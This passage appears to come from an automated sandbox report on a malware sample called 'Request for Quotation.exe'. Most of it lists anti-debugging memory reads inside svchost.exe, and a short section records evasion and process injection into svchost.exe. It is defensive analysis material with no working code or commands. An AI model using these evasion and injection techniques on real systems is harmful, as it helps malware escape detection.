Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03587190 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03570185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035EC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035EC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354B1B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035E11A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03605060 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03532050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035D705E mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035D705E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355B052 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03541070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AD070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035590DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AD0C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AD0C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035550E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035550E4 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_036050D9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03535096 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355D090 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355D090 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356909C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352D08D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03530750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03572750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03572750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03543740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03543740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03543740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03538770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03540770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03603749 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03530710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03560710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356F71F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356F71F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03537703 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03535702 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03535702 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0360B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03529730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03529730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03565734 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353973A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353973A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035EF72E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03533720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F972B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035357C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035357C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035357C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353D7E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035EF78A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_036037B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355D7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B97A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354C640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03562674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F866E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F866E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03569660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03569660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03533616 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03533616 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03572619 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03561607 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE609 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356F603 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03605636 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0354E627 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03566620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03568620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353262C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035EF6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035616CF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035ED6F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355D6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0355D6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03534690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03534690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035B368C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 14_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 14_2_007A4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Request for Quotation.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B07008
Source: C:\Users\user\Desktop\Request for Quotation.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Request for Quotation.exe"
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 14_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,
Source: Request for Quotation.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\Request for Quotation.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
